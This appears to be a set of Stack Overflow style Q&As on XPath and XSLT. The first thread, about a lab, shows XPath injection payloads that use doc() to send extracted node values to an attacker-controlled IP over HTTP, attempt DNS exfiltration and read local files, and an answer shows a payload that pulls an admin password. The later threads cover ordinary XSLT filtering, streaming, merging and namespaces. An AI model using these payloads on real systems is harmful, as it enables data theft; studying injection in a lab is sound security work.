xpath injections and doc() function - xpath

I'm trying to understand how the XPath doc() function can be used in several ways to carry out XPath injections.
Lab's query:
String xquery = "/root/books/book[contains(title/text(), '" + query + "')]";
I can use both XPath 2.0 and 3.0.
I'm able to extract data and export it through HTTP, for example:
test') and doc((concat('http://IP/data/?d=',(encode-for-uri((normalize-space((/*[1]/*[2]/*[2]/@*[2]))))))))/data=220248 and string('1'='1
But I'm not able to:
Extract data and export it through DNS requests:
test') and doc((concat(name((/[2])) , 'domain.com'))) and string('1'='1* -> it does not give any error, but nothing happens ( i don't know why stackoverflow strips the * from /*[2] )
Read a local xml file ( file's permissions are fine )
test') and doc('file:///home/lubuntu/test.xml')/text() and string('1'='1 -> it says file not found, when it is clearly there..
What is wrong in my payloads?
#updates
xpath processor: net.sf.saxon
os: Linux lubuntu 4.18.0-17-generic #18~18.04.1-Ubuntu
JAVA_HOME=/usr/local/openjdk-11
JAVA_VERSION=11.0.9.1
LANG=C.UTF-8
#about the file reading: problem solved. the lab was running inside of a docker
#about the data exfiltration via DNS requests: I still can't figure out why nothing happens. I also tried a basic injection like doc((concat('ABCTEST', '.domain.com' ))) and string('1'='1 but still nothing happens.

It is difficult to understand what exactly you are trying to achieve.
Here is a simple example of XPath injection in XSLT/XPath 3.0 using as a base the fact that:
contains($anyString, '') eq true()
Xml document:
<x>
<root>
<books>
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
</books>
</root>
</x>
XSLT stylesheet:
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">'</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
and finally, the result of applying the transformation on the Xml document:
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
Explanation:
We were able to get all <book> elements of the document and not only one of them that contains a particular string (the password :) ) in its <title>
Update
Here is another example:
we have a slightly different XML document:
<x>
<root>
<books>
<book name="regular">
<title>Book1 with password: regular</title>
</book>
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>
<book name="maintainer">
<title>Book3 with password: maintainer</title>
</book>
</books>
</root>
</x>
And the transformation now is (only $query is changed):
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">') and @name eq "admin" and true(</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
Now the result is that we get exactly the <book> element with the desired name "admin":
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>
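To see why both payloads work, it can help to print the string that actually reaches the XPath engine. The following is a minimal Python sketch that only mirrors the concatenation done by the two stylesheets above (prefix, then the untrusted query, then `)]`). The function name build_xpath is hypothetical, and nothing here evaluates the expression.

```python
# Prefix used by both stylesheets above; note that the opening quote is left unclosed.
PREFIX = "/x/root/books/book[contains(title/text(), '"


def build_xpath(query: str) -> str:
    """Concatenate the untrusted query the same way $vXpath2 is built."""
    return PREFIX + query + ")]"


# First example: a lone apostrophe closes the literal, leaving contains(..., '').
first = build_xpath("'")
# Second example: the payload closes the literal and appends an extra condition.
second = build_xpath("') and @name eq \"admin\" and true(")

print(first)
print(second)
```

In both cases the attacker-controlled text ends the string literal early, so the remainder of the input is parsed as XPath rather than as data.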


XSLT apply templates select condition on node list

I have an XML document with a list and want to apply a template that outputs only the nodes matching a condition, but the template is applied to the whole list. Could someone tell me what I am missing? I am relatively new to XSL.
The condition I want to apply is: dep is 7 and no city tag exists. I started with just the check that dep is 7. After applying the template, the output contains every employee instead of only those with dep 7. I expect the output not to contain the dep with value 9.
Input XML:
<employeeList>
<employee>
<dep>7</dep>
<salary>900</salary>
</employee>
<employee>
<dep>7</dep>
<city>LA</city>
<salary>500</salary>
</employee>
<employee>
<dep>9</dep>
<salary>600</salary>
</employee>
<employee>
<dep>7</dep>
<salary>800</salary>
</employee>
</employeeList>
My XSL:
<xsl:apply-templates select="employeeList[employee/dep = '7']" mode="e"/>
<xsl:template match="employeeList" mode="e">
<xsl:for-each select="employee">
<dep>
<xsl:value-of select="dep" />
</dep>
</xsl:for-each>
</xsl:template>
Output XML:
<dep>7</dep><dep>7</dep><dep>9</dep><dep>7</dep>
The condition I wanted to apply is if dep is 7 and no city tag exists
Such condition can be easily implemented using e.g.:
XSLT 1.0
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" version="1.0" encoding="UTF-8" indent="yes"/>
<xsl:template match="/employeeList">
<root>
<xsl:for-each select="employee[dep='7' and not(city)]">
<dep>7</dep>
</xsl:for-each>
</root>
</xsl:template>
</xsl:stylesheet>
Or shortly:
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" version="1.0" encoding="UTF-8" indent="yes"/>
<xsl:template match="/employeeList">
<root>
<xsl:copy-of select="employee[dep='7' and not(city)]/dep"/>
</root>
</xsl:template>
</xsl:stylesheet>
But it's hard to see the point in outputting X number of <dep>7</dep> elements.
You select the employeeList based on a condition on its employee/dep, but once you have selected it, that condition no longer matters, and the <xsl:for-each select="employee"> selects all employees, regardless of their dep.
You can repeat the condition in the xsl:for-each statement:
<xsl:for-each select="employee[dep = '7']">
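As a cross-check outside XSLT, the same selection (dep is 7 and no city child) can be sketched with Python's standard-library ElementTree. This is only an illustration under the assumption that the input is the employeeList shown in the question. ElementTree's XPath subset has no not(), so the "no city" test is done in Python.

```python
import xml.etree.ElementTree as ET

EMPLOYEES = """<employeeList>
  <employee><dep>7</dep><salary>900</salary></employee>
  <employee><dep>7</dep><city>LA</city><salary>500</salary></employee>
  <employee><dep>9</dep><salary>600</salary></employee>
  <employee><dep>7</dep><salary>800</salary></employee>
</employeeList>"""

root = ET.fromstring(EMPLOYEES)

# The predicate must sit on the employee step, not on employeeList.
dep_seven = root.findall("employee[dep='7']")
# Keep only the employees that have no <city> child.
selected = [e for e in dep_seven if e.find("city") is None]
salaries = [e.findtext("salary") for e in selected]

print(salaries)
```

The key point is the same as in the XSLT answers: the filter has to be applied to each employee, because filtering the parent list only decides whether the list as a whole is selected.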

Find first occurrence of node without traversing all of them using XPaths and elementpath library

I use elementpath to handle some XPath queries. I have an XML with linear structure which contains a unique id attribute.
<items>
<item id="1">...</item>
<item id="2">...</item>
<item id="3">...</item>
... 500k elements
<item id="500003">...</item>
</items>
I want the parser to find the first occurrence without traversing all the nodes. For example, I want to select //items/item[@id = '3'] and stop after iterating over 3 nodes only (not over 500k nodes). It would be a nice optimization for many cases.
An example using XSLT 3 streaming with a static parameter for the XPath, then using xsl:iterate with xsl:break to produce the "early exit" once the first item sought has been found would be
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="3.0"
xmlns:xs="http://www.w3.org/2001/XMLSchema"
exclude-result-prefixes="#all">
<xsl:param name="path" static="yes" as="xs:string" select="'items/item[@id = ''3'']'"/>
<xsl:output method="xml"/>
<xsl:mode on-no-match="shallow-copy" streamable="yes"/>
<xsl:template match="/" name="xsl:initial-template">
<xsl:iterate _select="{$path}">
<xsl:if test="position() = 1">
<xsl:copy-of select="."/>
<xsl:break/>
</xsl:if>
</xsl:iterate>
</xsl:template>
</xsl:stylesheet>
You can run it with SaxonC EE (unfortunately streaming is only supported by EE) and Python with e.g.
import saxonc

with saxonc.PySaxonProcessor(license=True) as proc:
    print("Test SaxonC on Python")
    print(proc.version)
    xslt30proc = proc.new_xslt30_processor()
    # Override the static parameter that holds the XPath to iterate over.
    xslt30proc.set_parameter('path', proc.make_string_value('/items/item[@id = "2"]'))
    transformer = xslt30proc.compile_stylesheet(stylesheet_file='iterate-items-early-exit1.xsl')
    xdm_result = transformer.apply_templates_returning_value(source_file='items-sample1.xml')
    if transformer.exception_occurred:
        print(transformer.error_message)
    print(xdm_result)
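If a Saxon EE license is not available, a similar early exit can be approximated with the standard library's incremental parser. The sketch below is not the elementpath or Saxon approach from above. It assumes the flat items/item structure from the question, uses a hypothetical helper named find_first_item, and only handles the simple "attribute equals value" case rather than arbitrary XPath.

```python
import io
import xml.etree.ElementTree as ET


def find_first_item(source, wanted_id):
    """Return (element, items_seen) for the first <item> with the given id."""
    seen = 0
    # iterparse yields elements as they are completed, so we can stop early.
    for _event, elem in ET.iterparse(source, events=("end",)):
        if elem.tag != "item":
            continue
        seen += 1
        if elem.get("id") == wanted_id:
            return elem, seen
        elem.clear()  # drop the content of items we no longer need
    return None, seen


# Small stand-in for the 500k-item document described in the question.
xml_bytes = (
    "<items>"
    + "".join(f'<item id="{i}">x</item>' for i in range(1, 1001))
    + "</items>"
).encode()

match, seen = find_first_item(io.BytesIO(xml_bytes), "3")
print(match.get("id"), seen)
```

The loop stops consuming parser events as soon as the match is found, although the parser may already have read ahead by one buffer of input.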

Nokogiri XSLT transform using multiple source XML files

I want to translate XML using Nokogiri. I built an XSL and it all works fine. I ALSO tested it in Intellij. My data comes from two XML files.
My problem occurs when I try to get Nokogiri to do the transform. I can't seem to find a way to get it to parse multiple source files.
This is the code I am using from the documentation:
require 'nokogiri'
doc1 = Nokogiri::XML(File.read('F:/transcoder/xslt_repo/core_xml.xml',))
xslt = Nokogiri::XSLT(File.read('F:/transcoder/xslt_repo/google.xsl'))
puts xslt.transform(doc1)
I tried:
require 'nokogiri'
doc1 = Nokogiri::XML(File.read('F:/transcoder/xslt_repo/core_xml.xml',))
doc2 = Nokogiri::XML(File.read('F:/transcoder/xslt_repo/file_data.xml',))
xslt = Nokogiri::XSLT(File.read('F:/transcoder/xslt_repo/test.xsl'))
puts xslt.transform(doc1,doc2)
However it seems transform only takes one argument, so at the moment I am only able to parse half the data I need:
<?xml version="1.0"?>
<package package_id="LB000001">
<asset_metadata>
<series_title>test asset 1</series_title>
<season_title>Number 1</season_title>
<episode_title>ET 1</episode_title>
<episode_number>1</episode_number>
<license_start_date>21-07-2016</license_start_date>
<license_end_date>31-07-2016</license_end_date>
<rating>15</rating>
<synopsis>This is a test asset</synopsis>
</asset_metadata>
<video_file>
<file_name/>
<file_size/>
<check_sum/>
</video_file>
<image_1>
<file_name/>
<file_size/>
<check_sum/>
</image_1>
</package>
How can I get this to work?
Edit:
This is the core_metadata.xml which is created via a PHP code block and the data comes from a database.
<?xml version="1.0" encoding="utf-8"?>
<manifest task_id="00000000373">
<asset_metadata>
<material_id>LB111111</material_id>
<series_title>This is a test</series_title>
<season_title>This is a test</season_title>
<season_number>1</season_number>
<episode_title>that test</episode_title>
<episode_number>2</episode_number>
<start_date>23-08-2016</start_date>
<end_date>31-08-2016</end_date>
<ratings>15</ratings>
<synopsis>this is a test</synopsis>
</asset_metadata>
<file_info>
<source_filename>LB111111</source_filename>
<number_of_segments>2</number_of_segments>
<segment_1 seg_1_start="00:00:10.000" seg_1_dur="00:01:00.000"/>
<segment_2 seg_2_start="00:02:00.000" seg_2_dur="00:05:00.000"/>
<conform_profile definition="hd" aspect_ratio="16f16">ffmpeg -i S_PATH/F_NAME.mp4 SEG_CONFORM 2> F:/Transcoder/logs/transcode_logs/LOG_FILE.txt</conform_profile>
<transcode_profile profile_name="xbox" package_type="tar">ffmpeg -f concat -i T_PATH/CONFORM_LIST TRC_PATH/F_NAME.mp4 2> F:/Transcoder/logs/transcode_logs/LOG_FILE.txt</transcode_profile>
<target_path>F:/profiles/xbox</target_path>
</file_info>
</manifest>
The second XML (file_data.xml) is dynamically created during the transcode process by Nokogiri:
<?xml version="1.0"?>
<file_data>
<video_file>
<file_name>LB111111_xbox_230816114438.mp4</file_name>
<file_size>141959922</file_size>
<md5_checksum>bac7670e55c0694059d3742285079cbf</md5_checksum>
</video_file>
<image_1>
<file_name>test</file_name>
<file_size>test</file_size>
<md5_checksum>test</md5_checksum>
</image_1>
</file_data>
I managed to work around this issue by hard-coding document() calls to file_data.xml in the XSLT file:
<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" indent="yes"/>
<xsl:template match="/">
<package>
<xsl:attribute name="package_id">
<xsl:value-of select="manifest/asset_metadata/material_id"/>
</xsl:attribute>
<asset_metadata>
<series_title>
<xsl:value-of select="manifest/asset_metadata/series_title"/>
</series_title>
<season_title>
<xsl:value-of select="manifest/asset_metadata/season_title"/>
</season_title>
<episode_title>
<xsl:value-of select="manifest/asset_metadata/episode_title"/>
</episode_title>
<episode_number>
<xsl:value-of select="manifest/asset_metadata/episode_number"/>
</episode_number>
<license_start_date>
<xsl:value-of select="manifest/asset_metadata/start_date"/>
</license_start_date>
<license_end_date>
<xsl:value-of select="manifest/asset_metadata/end_date"/>
</license_end_date>
<rating>
<xsl:value-of select="manifest/asset_metadata/ratings"/>
</rating>
<synopsis>
<xsl:value-of select="manifest/asset_metadata/synopsis"/>
</synopsis>
</asset_metadata>
<video_file>
<file_name>
<xsl:value-of select="document('file_data.xml')/file_data/video_file/file_name"/>
</file_name>
<file_size>
<xsl:value-of select="document('file_data.xml')/file_data/video_file/file_size"/>
</file_size>
<check_sum>
<xsl:value-of select="document('file_data.xml')/file_data/video_file/md5_checksum"/>
</check_sum>
</video_file>
<image_1>
<file_name>
<xsl:value-of select="document('file_data.xml')/file_data/image_1/file_name"/>
</file_name>
<file_size>
<xsl:value-of select="document('file_data.xml')/file_data/image_1/file_size"/>
</file_size>
<check_sum>
<xsl:value-of select="document('file_data.xml')/file_data/image_1/md5_checksum"/>
</check_sum>
</image_1>
</package>
</xsl:template>
</xsl:stylesheet>
I then use Saxon to do the transform:
xslt = "java -jar C:/SaxonHE9-7-0-7J/saxon9he.jar #{temp}core_metadata.xml #{temp}#{profile}.xsl > #{temp}#{file_name}.xml"
system("#{xslt}")
I would love to find a way to do this without having to hard-code file_data.xml into the XSLT.
Merge XML Documents and Transform
You'll have to do a bit of work to combine the XML content prior to your XSL transformation. @the-Tin-Man has a nice answer to a similar question in the archives, which can be adapted for your use case.
Let's say we have the following sample content:
<!--a.xml-->
<?xml version="1.0"?>
<xml>
<packages>
<package>Data here for A</package>
<package>Another Package</package>
</packages>
</xml>
<!--end a.xml-->
<!--b.xml-->
<?xml version="1.0"?>
<xml>
<packages>
<package>B something something</package>
</packages>
</xml>
<!--end b.xml-->
And we want to apply the following XSLT template:
<!--transform.xslt-->
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="//packages">
<html>
<body>
<h2>Packages</h2>
<ol>
<xsl:for-each select="./package">
<li><xsl:value-of select="text()"/></li>
</xsl:for-each>
</ol>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
<!--end transform.xslt-->
If we have parallel document structure, as in this case, we can merge the two XML documents' content together and pass that along for transformation.
require 'nokogiri'
doc1 = Nokogiri::XML(File.read('./a.xml'))
doc2 = Nokogiri::XML(File.read('./b.xml'))
moved_packages = doc2.search('package')
doc1.at('/descendant::packages[1]').add_child(moved_packages)
xslt = Nokogiri::XSLT(File.read('./transform.xslt'))
puts xslt.transform(doc1)
This would generate the following output:
<html><body>
<h2>Packages</h2>
<ol>
<li>Data here for A</li>
<li>Another Package</li>
<li>B something something</li>
</ol>
</body></html>
If your XML documents have varying structure, you may benefit from an intermediary XML nodeset that you add your content to, rather than the shortcut of merging document 2 content into document 1.
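The intermediary-document idea can be sketched as follows. This is an illustration in Python's ElementTree rather than Nokogiri, with trimmed-down versions of the two documents from the question, and the wrapper element name combined is hypothetical. A stylesheet applied to such a wrapper would need its paths adjusted accordingly, for example /combined/manifest/... and /combined/file_data/...

```python
import xml.etree.ElementTree as ET

# Trimmed-down stand-ins for core_metadata.xml and file_data.xml.
manifest = ET.fromstring(
    "<manifest><asset_metadata>"
    "<material_id>LB111111</material_id>"
    "</asset_metadata></manifest>"
)
file_data = ET.fromstring(
    "<file_data><video_file>"
    "<file_name>LB111111_xbox_230816114438.mp4</file_name>"
    "</video_file></file_data>"
)

# Hypothetical wrapper element holding both source documents side by side.
combined = ET.Element("combined")
combined.append(manifest)
combined.append(file_data)

material_id = combined.findtext("manifest/asset_metadata/material_id")
file_name = combined.findtext("file_data/video_file/file_name")
print(material_id, file_name)
```

Because neither source tree is modified, this avoids having to decide which document "owns" the merged content.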

How do I use the msxsl:node-set to get a node set that I can use in a template parameter?

TL;DR; Why can't I use the element name in the XPATH going against a msxsl:node-set? It always returns nothing, as if the node-set is empty, when debugging shows that it is not empty.
Details: I need to use a node-set in an XSLT 1.0 document because my source XML is missing an important node. Instead of having to rewrite the entire XSLT, I'd like to instead inject a node-set so that my XSLT processing can continue as normal. I would like to use XPATH on the node-set but I am not able to use the actual element names, instead only a * works, but I am not sure why, or how I can access the actual element names in the XPATH.
Here is my XML (example only, the XML document here is the least important, see XSLT):
<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet type="text/xsl" href="generic.xslt" ?>
<ParentNode xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" i:noNamespaceSchemaLocation="generic.xsd">
<SomeChildNode>text</SomeChildNode>
</ParentNode>
Here is my XSLT:
<?xml version="1.0" encoding="utf-16"?>
<xsl:stylesheet version="1.0" xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:a="http://schemas.datacontract.org/2004/07/MeM.BizEntities" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<xsl:output method="xml" indent="yes" encoding="utf-16" omit-xml-declaration="no" />
<!-- Global Variables, used in multiple places -->
<xsl:variable name="empty"/>
<!-- Match Templates -->
<xsl:template match="ParentNode">
<ArrayOfSalesOrder>
<xsl:for-each select="SomeChildNode">
<xsl:call-template name="SomeChildNodeTemplate">
<xsl:with-param name="order" select="."/>
</xsl:call-template>
</xsl:for-each>
</ArrayOfSalesOrder>
</xsl:template>
<xsl:template name="SomeChildNodeTemplate">
<xsl:variable name="someRTF">
<Items>
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
</xsl:variable>
<xsl:call-template name="ItemsTemplate">
<xsl:with-param name="items" select="msxsl:node-set($someRTF)"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="ItemsTemplate">
<xsl:param name="items"/>
<ItemsTransformed>
<xsl:for-each select="$items/Item">
<NewItem>
<NewCode>
<xsl:value-of select="Code"/>
</NewCode>
</NewItem>
</xsl:for-each>
</ItemsTransformed>
<ItemsTransformedThatWorksButNotHowIWant>
<xsl:for-each select="$items/*/*">
<NewItem>
<NewCode>
<xsl:value-of select="*[1]"/>
</NewCode>
<NewPrice>
<xsl:value-of select="*[2]"/>
</NewPrice>
<NewQuantity>
<xsl:value-of select="*[3]"/>
</NewQuantity>
</NewItem>
</xsl:for-each>
</ItemsTransformedThatWorksButNotHowIWant>
</xsl:template>
</xsl:stylesheet>
I would expect to be able to use XPATH to query into the node-set such that I can use their proper element names. This doesn't seem to be the case, and I'm struggling to understand why. I know there can be namespacing issues, but trying *:Item etc. doesn't work for me. I am able to use *[local-name()='Item'] but this seems like a horrible work around, not to mention that I'll have to rewrite any downstream templates and that is what I'm trying to avoid by using the node-set in the first place.
Result:
<?xml version="1.0" encoding="utf-16"?>
<ArrayOfSalesOrder xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:a="http://schemas.datacontract.org/2004/07/MeM.BizEntities" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<ItemsTransformed />
<ItemsTransformedThatWorksButNotHowIWant>
<NewItem>
<NewCode>code</NewCode>
<NewPrice>75</NewPrice>
<NewQuantity>1</NewQuantity>
</NewItem>
<NewItem>
<NewCode>code2</NewCode>
<NewPrice>100</NewPrice>
<NewQuantity>3</NewQuantity>
</NewItem>
</ItemsTransformedThatWorksButNotHowIWant>
</ArrayOfSalesOrder>
As you can see, I can get it to work with * but this is not very usable on a more complex structure. What am I doing wrong? Does this have to do with namespaces?
I would expect to see something under the <ItemsTransformed /> node, but instead it is just empty, and so far I can't get anything except the * to work.
The SO question below is what I was using, I thought I had an answer there, but I can't get the XPATH to work.
Reference:
XSLT 1.0 - Create node set and pass as a parameter
The problem here is that your stylesheet has a default namespace:
xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2"
Therefore, when you do:
<xsl:variable name="someRTF">
<Items>
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
</xsl:variable>
you are populating your variable with elements in the default namespace, so the variable actually contains:
<Items xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2">
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
Naturally, when you try later to select something like:
<xsl:for-each select="xyz:node-set($someRTF)/Items/Item">
you select nothing, because both Items and Item are in the default namespace and you're not calling them by their fully qualified name.
--- edit: ---
The problem can be easily solved by making sure that the root element of the variable - and by extension, all its descendants - are in no namespace.
Here's a simplified example (will run with any input):
XSLT 1.0
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2"
xmlns:exsl="http://exslt.org/common"
exclude-result-prefixes="exsl">
<xsl:output method="xml" version="1.0" encoding="UTF-8" indent="yes"/>
<xsl:variable name="someRTF">
<Items xmlns="">
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
</xsl:variable>
<xsl:template match="/">
<ArrayOfSalesOrder>
<ItemsTransformed>
<xsl:for-each select="exsl:node-set($someRTF)/Items/Item">
<NewItem>
<NewCode>
<xsl:value-of select="Code"/>
</NewCode>
</NewItem>
</xsl:for-each>
</ItemsTransformed>
</ArrayOfSalesOrder>
</xsl:template>
</xsl:stylesheet>
Result:
<?xml version="1.0" encoding="UTF-8"?>
<ArrayOfSalesOrder xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2">
<ItemsTransformed>
<NewItem>
<NewCode>code</NewCode>
</NewItem>
<NewItem>
<NewCode>code2</NewCode>
</NewItem>
</ItemsTransformed>
</ArrayOfSalesOrder>
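The namespace effect described above is not specific to XSLT. As a rough illustration, the sketch below reproduces it with Python's standard-library ElementTree. The Wrapper element is hypothetical and only exists to put a default namespace in scope, the way the stylesheet root does.

```python
import xml.etree.ElementTree as ET

NS = "http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2"

# Items inherits the default namespace, as the variable content does in the question.
in_default_ns = ET.fromstring(
    f'<Items xmlns="{NS}"><Item><Code>code</Code></Item></Items>'
)
# xmlns="" on Items puts it and its descendants back in no namespace.
in_no_ns = ET.fromstring(
    f'<Wrapper xmlns="{NS}"><Items xmlns=""><Item><Code>code</Code></Item></Items></Wrapper>'
)

unqualified = in_default_ns.findall("Item")           # plain name: no match
qualified = in_default_ns.findall("d:Item", {"d": NS})  # namespace-qualified: match
reset = in_no_ns.findall("Items/Item")               # plain name works after xmlns=""

print(len(unqualified), len(qualified), len(reset))
```

This mirrors the two ways out of the problem: either qualify the names in the path, or declare xmlns="" on the root of the variable so the unqualified names match.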

Xpath: filter out childs

I'm looking for an XPath expression that filters out certain children. A child must contain a CCC node with B in it.
Source:
<AAA>
<BBB1>
<CCC>A</CCC>
</BBB1>
<BBB2>
<CCC>A</CCC>
</BBB2>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
This should be the result:
<AAA>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
Hopefully someone can help me.
Jos
XPath is a query language for XML documents. As such it can only select nodes from existing XML document(s) -- it cannot modify an XML document or create a new XML document.
Use XSLT in order to transform an XML document and create a new XML document from it.
In this particular case:
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:strip-space elements="*"/>
<xsl:template match="node()|@*">
<xsl:copy>
<xsl:apply-templates select="node()|@*"/>
</xsl:copy>
</xsl:template>
<xsl:template match="/*/*[not(CCC = 'B')]"/>
</xsl:stylesheet>
when this transformation is applied on the provided XML document:
<AAA>
<BBB1>
<CCC>A</CCC>
</BBB1>
<BBB2>
<CCC>A</CCC>
</BBB2>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
the wanted, correct result is produced:
<AAA>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
In order to select all of the desired element and text nodes, use this XPATH:
//node()[.//CCC[.='B']
or self::CCC[.='B']
or self::text()[parent::CCC[.='B']]]
This could be achieved more simply using XPath with a modified identity transform XSLT:
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output indent="yes" />
<!--Empty template for the content we want to redact -->
<xsl:template match="*[CCC[not(.='B')]]" />
<!--By default, copy all content forward -->
<xsl:template match="@*|node()">
<xsl:copy>
<xsl:apply-templates/>
</xsl:copy>
</xsl:template>
</xsl:stylesheet>
Try this:
"//CCC[text() = 'B']"
It should return all CCC nodes whose inner text is B.
If you want to get AAA, BBB3 and BBB4 you can use the following
//*[descendant::CCC[text()='B']]
If BBB3 and BBB4 only then
//*[CCC[text()='B']]
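Since XPath alone can only select nodes, producing the trimmed document still needs a host language. As one possible illustration (not taken from any of the answers above), here is a minimal sketch with Python's standard-library ElementTree that selects the children to keep with a path expression and removes the rest.

```python
import xml.etree.ElementTree as ET

root = ET.fromstring(
    "<AAA>"
    "<BBB1><CCC>A</CCC></BBB1>"
    "<BBB2><CCC>A</CCC></BBB2>"
    "<BBB3><CCC>B</CCC></BBB3>"
    "<BBB4><CCC>B</CCC></BBB4>"
    "</AAA>"
)

# Children of AAA that have a CCC child whose text is exactly "B".
keep = root.findall("*[CCC='B']")

# Iterate over a copy, because removing while iterating would skip elements.
for child in list(root):
    if child not in keep:
        root.remove(child)

remaining = [child.tag for child in root]
print(remaining)
print(ET.tostring(root, encoding="unicode"))
```

The selection step corresponds to the //*[CCC[text()='B']] expression above, restricted to the direct children of the root.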
